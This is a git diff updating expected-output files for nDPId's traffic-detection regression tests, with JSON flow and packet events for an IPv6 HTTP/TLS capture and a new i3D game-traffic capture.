+00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3080,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":471,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}} 
+00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1448269146905,"flow_last_seen":1448269146970,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1448269146905,"flow_last_seen":1448269146966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1448269127400,"flow_last_seen":1448269138520,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":12133,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1448269127400,"flow_last_seen":1448269138520,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":12133,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
-00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} -00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1448269139219,"flow_last_seen":1448269139339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
-00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1448269144450,"flow_last_seen":1448269144884,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":13365,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
+00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1448269139219,"flow_last_seen":1448269139339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
+00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1448269144450,"flow_last_seen":1448269144884,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":13365,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} @@ -104,9 +104,9 @@ ~~ total active/idle flows...: 15/15 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5960301 bytes -~~ total memory freed........: 5960301 bytes -~~ total allocations/frees...: 118433/118433 +~~ total memory allocated....: 6093935 bytes +~~ total memory freed........: 6093935 bytes +~~ total allocations/frees...: 121195/121195 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2310 chars diff --git a/test/results/i3d.pcap.out b/test/results/i3d.pcap.out new file mode 100644 index 000000000..ea01322ba --- /dev/null 
+++ b/test/results/i3d.pcap.out 
@@ -0,0 +1,44 @@ +00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"i3d.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"i3d.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1643566147188} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"i3d.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643566147188,"flow_last_seen":1643566147188,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1643566147188,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":60476,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"i3d.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643566147188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643566147188,"pkt":"eJS0JASgYDjgxTWgCABFAABmU1sAAH8R+EzAqAJk1aNXL+w8w1QAUphQAAEARgADz6gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA95U="} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"i3d.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643566147188,"flow_last_seen":1643566147188,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1643566147188,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":60476,"dst_port":50004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"i3D","breed":"Acceptable","category":"Game"}} +00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"i3d.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643566147212,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643566147212,"pkt":"YDjgxTWgeJS0JASgCABFAABmT1JAADsRAFbVo1cvwKgCZMNU7DwAUkFJAAIARgADz6g5MC4xODYuMTMyLjEzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7Dw="} 
+00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"i3d.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643566147224,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1643566147224,"pkt":"eJS0JASgYDjgxTWgCABFAACoU10AAH8R+AjAqAJk1aNXL+w8w1QAlAApkHiUJQdnxvIAA8+ovt4AAfZr38uFzZsIi8ZCCYTQPXHtOHv0CzWfwBUspYBgwVoFrs7CIolbntTbNC\/JUzHrMPTo+XsMJQLsyF07SXVZB\/s4ty9sKDXZEitaLRpRsI4IOF0cfX+Uc0Uf1VgbctkHIRIB7WkAQW7E9Ft4IwjFcGTVfDpX71058AMMAIA="} +00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"i3d.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":2431,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1643572927206} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"i3d.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643572927206,"flow_last_seen":1643572927206,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1643572927206,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":55205,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"i3d.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643572927206,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643572927206,"pkt":"eJS0JASgYDjgxTWgCABFAABmU0sAAH8R+FzAqAJk1aNXL9elw1QAUhLaAAEARgADz6gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkaM="} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"i3d.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643572927206,"flow_last_seen":1643572927206,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1643572927206,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":55205,"dst_port":50004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"i3D","breed":"Acceptable","category":"Game"}} +00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"i3d.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1643572927231,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643572927231,"pkt":"YDjgxTWgeJS0JASgCABFAABmdVlAADsR2k7Vo1cvwKgCZMNU16UAUmp3AAIARgADz6g5MC4xODYuMTMyLjEzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA16U="} 
+00924{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"i3d.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1643572927237,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":407,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":407,"pkt_l4_len":373,"thread_ts_msec":1643572927237,"pkt":"eJS0JASgYDjgxTWgCABFAAGJU04AAH8R9zbAqAJk1aNXL9elw1QBdefukHjAYBrNpDIAA8+ovt4AAWLcvr+lZkOZKn9N4wir1XJMMpIj+rYcuzK9b1B1dSYUAusllGSD7Iks\/lDJGHLRp26V2oDMfvBvVg\/cehuUzNPuTaUyCbeYyBzqdN2QAWcCejnBWaAwUIIs\/jXqYgZrYxUTaCdL+6NeLrqdS7Vo5T25dnjeJo81dd3KqWFk2zyE5wTxTLybdmbQUV3Ko3TOFtK8OGoZc3PzKCoWW0DiwqJ40DNSzxp9qHRwhnGsEgZlbxs7f4dVoHC9WXsc6WP5YQOu93sjesws4bynoNqKgNl3SMX+lEYrOX0Ex+m8gzL5OwV9KAw2ujOO62zCH3sUJuEubxY489PEvx7xGvYJYlElAmw7xQ1BXYxwsg\/f06VJLUwc0mmioSN1wd226+8foscTKbQr8HhvEn4cO82JBw50ZgifvJteHJ7GxVcU\/EgZEjYJcSMvKOfS+EOUIjuBX2FFEQgqdE0m7zcGGYA="} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"i3d.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1643566147188,"flow_last_seen":1643566147407,"flow_idle_time":200000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":2431,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1643572927312,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":60476,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"i3D","breed":"Acceptable","category":"Game"}} 
